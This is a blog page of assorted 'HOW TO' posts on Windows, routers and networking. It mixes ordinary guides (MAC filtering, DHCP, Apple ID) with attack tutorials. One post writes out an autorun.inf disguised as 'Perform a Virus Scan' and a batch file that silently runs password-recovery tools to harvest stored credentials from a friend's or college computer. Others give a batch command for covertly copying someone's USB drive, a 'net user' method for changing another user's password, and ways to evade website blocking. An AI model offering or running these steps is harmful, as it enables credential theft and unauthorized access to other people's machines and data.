Showing posts with label HOW TO. Show all posts

HOW TO CONFIGURE WIRELESS MAC ADDRESS FILTER ON WIRELESS ROUTER

Open the web browser and type http://tplinklogin.net or IP address in the address bar (default is http://192.168.0.1 or http://192.168.1.1). Press Enter. The username and password are both “admin”.
 
Step 2
Go to IP & MAC Binding->ARP List page, you can find the MAC address of the PC which is connected to the device.
 
Step 3
Go to Wireless->Wireless MAC Filtering page, click the Add New button.
 
Step 4
Type in the MAC address and give a description for this item. The status should be Enabled and at last, click the Save button.
 
You need add items in this way one by one, 64 is the maximum number.
 
Step 5
At last, about the Filtering Rules, please choose Allow and Enable the Wireless MAC Filtering function.

HOW TO HACK PASSWORD USING USB

Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack
passwords from your friend’s/college Computer.
We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.
------------------------------------------------------------------------------------------------
Here is a step by step procedre to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.
2. Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT
files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the
Computer

HOW TO ACCESS BLOCK'S WEBSITES.

I know a lot of people like to try and access blocked websites at school, college or work so I'm sharing several ways of viewing these blocked sites. Normally when I look around the internet I see one or two of these tricks posted to help people(I didn't discover any of these tricks - a lot of you will already know most), and not all tricks will work on some computers. But this tutorial will share with you 7 ways of accessing blocked websites(as well as teaching you a bit about each one).

1. Proxy Websites
2. Ultrasurf
3. HTTPS
4. Visit With IP's
5. EmailTheWeb
6. Use Translation Websites
7. Ask The Administrators

1. Proxy Websites
Proxy websites work like a middle-man between you and the website you want to visit. Normally, your computer sends the request to the website for all of the information. However in this case, the proxy sends the request to the website and displays it to you. You do not directly connect to the website, which is why you can view webpages that are blocked. The only problem on some computers is that they try to block proxy websites too. It is best to use new proxies and always search for fresh ones while at home as after being used a few times, your school admins will usually block the proxy website.
This is one website which contains a list of proxy websites:
http://www.proxy4free.com/list/webproxy1.html

2. Ultrasurf
Ultrasurf is a free executable program which hides your IP from websites, encrypts connection and most importantly it allows you on blocked websites. Ultrasurf works very similarly to the proxy websites described above. Below is Ultrasurf's website:
http://ultrasurf.us/
It can be carried on a USB stick and you don't have to install it on the computer you want to use it on.

3. HTTPS
Look at most links and you will find they start with "http". This means that they use the Hypertext Transfer Protocol, which is a way of communicating between servers and computers. A different method websites can use is "https", a more secure version of http. Many admins often only block http sites, and not https sites. This means that you can simply add "s" after the http to access a more secure, and unblocked, version of the same website(the website will generally look the same if you do this).

4. Visit With IP's
Every computer, server or network connected to the internet has an assigned internet protocol(IP) address. These IP addresses(e.g. 173.194.41.82) can be used instead of domain names(e.g. http://www.google.com/) to visit the same webpage. Some schools block domain names only, so IP addresses can be entered to successfully view the same website.
To find a websites IP address, open up command prompt(cmd). With cmd open, type "nslookup http://www.WhateverWebsite.com/" or "ping http://www.WhateverWebsite.com/". The IP address will look something like the following: 173.194.41.82. Basically, it will be four numbers ranging from 0 to 255 separated by full stops.
Since cmd is blocked on many computers where you do not have admin privileges you can also look online for website IP's with:
http://www.getip.com/

5. EmailTheWeb
EmailTheWeb is a website which allows you to email a website to yourself. You need a Google account, but can enter any webpage to be emailed to your account, which can then be viewed in your email inbox. EmailTheWeb has downloadable toolbars for a few browsers as well so you don't have to visit the website.
This is the website:
http://www.emailtheweb.com/index.html

6. Use Translation Websites
Translation websites use a frame to show you the website. Like many other methods in this tutorial, the translation website will connect to the website you want to visit and show you it in the language of your choice. You are seeing the website through the translation website, so as long as you can visit the translation website, this method should work.
Two popular translation websites are:
http://www.bing.com/translator
https://translate.google.co.uk/

HOW TO BLOCK WEBSITES IN WINDOWS 7

In this post now i am telling about HOW TO BLOCK A WEBSITES in Windows 7. In the world are several options available for blocking a website. But i am tells a very simple way to block the websites.

Blocking a site using these steps will only block the website on one computer. Any other computer, phone, or tablet connected to your computer will be able to access the site you're blocking.
A website can be blocked on any Windows computer by editing the hosts file, in Windows this file is referred to as the lmhost file.
Locate the hosts file in Windows Explorer. For Windows XP and up, it will be located in the directory C:\WINDOWS\system32\drivers\etc\. In Windows 2000/NT, C:\WINNT\system32\drivers\etc\. In Windows 98 and ME, C:\WINDOWS\system32\drivers\etc\. In windows 7 and 8.
Navigate to the proper directory using Windows Explorer. Double-click the hosts file. Choose Notepad from the list of programs to open the file and edit it in Notepad.
Find the line below:
127.0.0.1 localhost
Right underneath it, add the following lines (replacing Mywebsite.com with the site you wish to block):
127.0.0.1 Mywebsite.com
127.0.0.1 www.Mywebsite.com
 NOTE:- Now u want to save this file but it will never save. So don't panic. Now Right click on the host  file. Go on the Security tap. Now click on the EDIT. Then click on the Full Control. then Apply and Ok.
Click on the File menu and click Save. Close the file. The site should be blocked in all web browsers and now instead of trying to access that site the computer will redirect you to the localhost.

HOW TO EDIT PHOTO ON FACEBOOK ONLINE


How to edit Photo in facebook


Online photo editor for facebook u can directly edit photos of your choice easily and download photos by using photon -facebook editor.

1. Go to chrome webstore and search phone photo editor for fb

2. click on add button extension will be added .

3. Reload facebook account.open the image you want to edit .

4. You can find horzontal buttons download , Edit.

5. Click on the edit and then edit as per your wish it is easy and simple.

HOW TO COPY DATA FROM PENDRIVE ON INSERT



HI all, Hope you all are fine, Today i am
back with awesome trick.
Today we will learn How to copy Data From
Pendrive On Insert,
We sometime wish that if someone insert
his/her pendrive or Dvd Into your pc then
its data automatically copy in to your
system in hidden Form.
there is no need of software in this. we will
make it possible with the help of some Dos
commands.


lets get started, Follow the below steps.


1. open cmd
3. type copy con filename.bat
3. now type “xcopy
i: f:\copied /h /s /c /q /i” remove ” “
4. type Exit
4. press f6
5. now it will create a batch file named
filename.bat
here
xcopy is a command which is used to copy
file and folder
i: is the name of your pen-drive drive name
replace with your drive name
f:\copied is the name of folder where you
wish to copied data is to be placed replace
with your own folder or path
/h is used to copy hidden files also
now copy this file into desktop now
whenever someone insert his/her pendrive
into your system then click on this file his
data is automatically copied into the folder
specified by you.
isn’t it cool, Try it yourself, dont forget to g
+1 this.
Keep visiting, Stay updated.

HOW TO HACK WINDOWS ADMIN. PASSWORD WITHOUT KNOWING OLD PASSWORD




How To Hack Windows Admin. Password

With the following awesome trick you can change the Windows Administrator Password in case you forgot or want to hack Administrator password.

STEP-1 Open the command prompt.
STEP-2 Now type( net user )and hit enter..
STEP-3 Now the computer show you a list of user accounts on the computer. For example you need to change the password of user account named rohit just do the following steps.
STEP-4 Type( net user rohit* )and hit enter. Now system will ask you to enter a new password for the account.
(If you find any error Like Access denied Run cmd As Administrator and try it)
That's it now you have successfully changed user password without knowing his old password..

HOW CREATE DHCP SERVER

This step-by-step article describes how to configure a new Windows Server 2003-based Dynamic Host Configuration Protocol (DHCP) server on a stand-alone server to provide centralized management of IP addresses and other TCP/IP configuration settings for the client computers on a network.

How to Install the DHCP Service

Before you can configure the DHCP service, you must install it on the server. DHCP is not installed by default during a typical installation of Windows Standard Server 2003 or Windows Enterprise Server 2003. You can install DHCP either during the initial installation of Windows Server 2003 or after the initial installation is completed.

How to Install the DHCP Service on an Existing Server

  1. Click Start, point to Control Panel, and then click Add or Remove Programs.
  2. In the Add or Remove Programs dialog box, click Add/Remove Windows Components.
  3. In the Windows Components Wizard, click Networking Services in the Components list, and then click Details.
  4. In the Networking Services dialog box, click to select the Dynamic Host Configuration Protocol (DHCP) check box, and then click OK.
  5. In the Windows Components Wizard, click Next to start Setup. Insert the Windows Server 2003 CD-ROM into the computer's CD-ROM or DVD-ROM drive if you are prompted to do so. Setup copies the DHCP server and tool files to your computer.
  6. When Setup is completed, click Finish.

How to Configure the DHCP Service

After you have installed the DHCP service and started it, you must create a scope, which is a range of valid IP addresses that are available for lease to the DHCP client computers on the network. Microsoft recommends that each DHCP server in your environment have at least one scope that does not overlap with any other DHCP server scope in your environment. In Windows Server 2003, DHCP servers in an Active Directory-based domain must be authorized to prevent rogue DHCP servers from coming online. Any Windows Server 2003 DHCP Server that determines itself to be unauthorized will not manage clients.

How to Create a New Scope

  1. Click Start, point to Programs, point to Administrative Tools, and then click DHCP.
  2. In the console tree, right-click the DHCP server on which you want to create the new DHCP scope, and then click New Scope.
  3. In the New Scope Wizard, click Next, and then type a name and description for the scope. This can be any name that you want, but it should be descriptive enough so that you can identify the purpose of the scope on your network (for example, you can use a name such as "Administration Building Client Addresses"). Click Next.
  4. Type the range of addresses that can be leased as part of this scope (for example, use a range of IP addresses from a starting IP address of 192.168.100.1 to an ending address of 192.168.100.100). Because these addresses are given to clients, they must all be valid addresses for your network and not currently in use. If you want to use a different subnet mask, type the new subnet mask. Click Next.
  5. Type any IP addresses that you want to exclude from the range that you entered. This includes any addresses in the range described in step 4 that may have already been statically assigned to various computers in your organization. Typically, domain controllers, Web servers, DHCP servers, Domain Name System (DNS) servers, and other servers, have statically assigned IP addresses. Click Next.
  6. Type the number of days, hours, and minutes before an IP address lease from this scope expires. This determines how long a client can hold a leased address without renewing it. Click Next, and then click Yes, I want to configure these options now to extend the wizard to include settings for the most common DHCP options. Click Next.
  7. Type the IP address for the default gateway that should be used by clients that obtain an IP address from this scope. Click Add to add the default gateway address in the list, and then click Next.
  8. If you are using DNS servers on your network, type your organization's domain name in the Parent domain box. Type the name of your DNS server, and then click Resolve to make sure that your DHCP server can contact the DNS server and determine its address. Click Add to include that server in the list of DNS servers that are assigned to the DHCP clients. Click Next, and then follow the same steps if you are using a Windows Internet Naming Service (WINS) server, by adding its name and IP address. Click Next.
  9. Click Yes, I want to activate this scope now to activate the scope and allow clients to obtain leases from it, and then click Next.
  10. Click Finish.
  11. In the console tree, click the server name, and then click Authorize on the Action menu.

Troubleshooting

The following sections explain how to troubleshoot some of the issues that you may experience when you try to install and configure a Windows Server 2003-based DHCP server in a workgroup.

Clients Cannot Obtain an IP Address

If a DHCP client does not have a configured IP address, this typically indicates that the client was not able to contact a DHCP server. This can be caused by a network problem, or because the DHCP server is unavailable. If the DHCP server started and other clients can obtain valid addresses, verify that the client has a valid network connection and that all the related client hardware devices (including cables and network adapters) are working properly.

The DHCP Server Is Unavailable

If a DHCP server does not provide leased addresses to clients, it is frequently because the DHCP service did not start. If this is the case, the server may not be authorized to operate on the network. If you were previously able to start the DHCP service, but it has since stopped, use Event Viewer to check the System log for any entries that may explain why you cannot start the DHCP service.

To restart the DHCP service:
  1. Click Start, and then click Run.
  2. Type cmd, and then press ENTER.
  3. Type net start dhcpserver, and then press ENTER.
-or-
  1. Click Start, point to Control Panel, point to Administrative Tools, and then click Computer Management.
  2. Expand Services and Applications, and then click Services.
  3. Locate and then double-click DHCP Server.
  4. Verify that Startup is set to Automatic and that Service Status is set to Started. If not, click Start.
  5. Click OK, and then close the Computer Management window.

HOW TO CREATE APPLE ID

If you've ever bought music from the iTunes Store, or if you've bought an iOS device, you were probably asked to create an Apple ID. The Apple ID is an account that you can use to access all of Apple's services. You can use it to buy music, TV shows, and apps from the iTunes Store, or you can buy apps for your Mac from the Mac App Store(if you have OS X Lion or Snow Leopard). You'll also need an Apple ID in order to use iCloud.
If you don't have an Apple ID, you can follow the steps below to set it up.

To Create an Apple ID:

    1. Go to the My Apple ID page and click Create an Apple ID.
The Apple ID pageThe Apple ID page
    1. Type your email address. This will be used as your Apple ID. You will also need to choose a password.
Typing an email address and passwordTyping an email address and password
    1. Continue filling out the form with your security questionnameaddress and other info.
Typing a name and addressTyping a name and address
    1. If you do not want to receive emails from Apple, uncheck the check boxes under Contact Preferences.
Contact PreferencesContact Preferences
    1. Type the letters and/or numbers you see in the verification image. Then, check the box stating that you have read and agree to the Terms of Service and Privacy Policy.
The verification image and Terms of Service check boxThe verification image and Terms of Service check box
    1. Click Create Apple ID. Apple will then send you a verification email. You will need to sign in to your email and follow the directions in the verification email to complete your registration.
Creating an Apple IDCreating an Apple ID

Providing Payment Information

When you create an Apple ID with a web browser, it won't ask for any payment information. That's because many Apple services (such as iCloud) do not require payment. However, when you sign in to the iTunes Store or theMac App Store, you will be asked to review your account information. You will then need to provide a credit card number and billing address.
Reviewing account informationReviewing account information
You can also create an Apple ID in iTunes or the Mac App Store by going to Store > Create Account. When you do this, you will need to provide your payment information during the registration process.
Creating an Apple ID in the Mac App StoreCreating an Apple ID in the Mac App Store

How To Unlock Any 3g Dongle For All Sim Networks

Internet is growing day by day thousands of people buy 3g dongle/net setter or modem to surf the internet on their pc or laptop. Why people buy 3g usb dongle? Because it’s the coolest way to connect to internet anywhere with your laptop or tablet in car, house, park, club, party etc. You don’t need to seat in your computer room with a wired modem. 
    But when we buy these 3g dongle they are locked with a specific sim operator. You can use only that operator which is provided with that 3g dongle. Suppose their 3g plans price won’t go low. But another operator gives faster speed with cheaper price. Will you buy another operator dongle? 
Answer is NO. You don’t have to spend money on new dongle. I will show you simple ways to unlock your 3g dongle. So you can use any 3g operator sim with same dongle that you have.


Well there are many software to unlock your data card by entering unlock code. You can get that unlock code from few softwares like universal master code. you can get this software on google  by searching for "universal master code" download it and enter your data card IMEI number and it will calculate your unlock code

Another Way To Unlock Your 3g Data Card / Dongle.



  1. Download Dc Unlocker from here.
  2. Install this software.
  3. Open dc unlocker.
  4. Select modem manufacture and model as Auto Detected (Recommended).
  5. Now Scan your device.
  6. Click on Server. Enter your username and password.(you will get it after purchasing credit from www.dc-unlocker.com/buy) Now press click login.
  7. Now click on unlocking then unlock.

How to download torrents with idm on one click.....

Today i will goes to show you how download the torrents With IDM... 

Just Follow Simple Steps :
Click Here 

How to Reset Windows Passwords Using the Userpasswords2 Command from an Administrator Account

If you cannot log on to Windows by using a particular user account, but you can log on to another account that has administrative credentials, follow these steps on how to do the trick.


  1. Reset Windows Passwords Using the Userpasswords2 Command from an Administrator Account Step 1.jpg
    1
    Log on to Windows by using an administrator account that has a password that you remember. You may need to start Windows XP in safe mode.

  2. Reset Windows Passwords Using the Userpasswords2 Command from an Administrator Account Step 2.jpg
    2
    Click Start, and then click Run.
  3. Reset Windows Passwords Using the Userpasswords2 Command from an Administrator Account Step 3.jpg
    3
    In the Open box, type “control userpasswords2″, and then click OK.
  4. Reset Windows Passwords Using the Userpasswords2 Command from an Administrator Account Step 4.jpg
    4
    Click the user account that you forgot the password for, and then click Reset Password.
  5. Reset Windows Passwords Using the Userpasswords2 Command from an Administrator Account Step 5.jpg
    5
    Type a new password in both the New password and the Confirm new password boxes, and then click OK.